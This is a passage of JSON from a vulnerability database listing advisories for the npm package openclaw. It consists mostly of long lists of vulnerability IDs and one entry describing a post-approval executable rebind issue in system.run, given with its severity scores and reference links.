rability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-jr6x-2q95-fh2g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nxnv-bqua-gkcb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50478?format=json","vulnerability_id":"VCID-pcea-jxne-vygc","summary":"OpenClaw: system.run approvals did not bind PATH-token executable identity, enabling post-approval executable rebind\nFor `host=node` runs, approvals validated command context but did not pin executable identity for non-path-like `argv[0]` tokens (for example `tr`). If PATH resolution changed after approval, execution could run a different binary.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31997","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01084","published_at":"2026-06-07T12:55:00Z"},{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.01085","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31997"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T14:05:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997","reference_id":"CVE-2026-31997","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997"},{"reference_url":"https://github.com/advisories/GHSA-q399-23r3-hfx4","reference_id":"GHSA-q399-23r3-hfx4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q399-23r3-hfx4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4","reference_id":"GHSA-q399-23r3-hfx4","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T14:05:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCI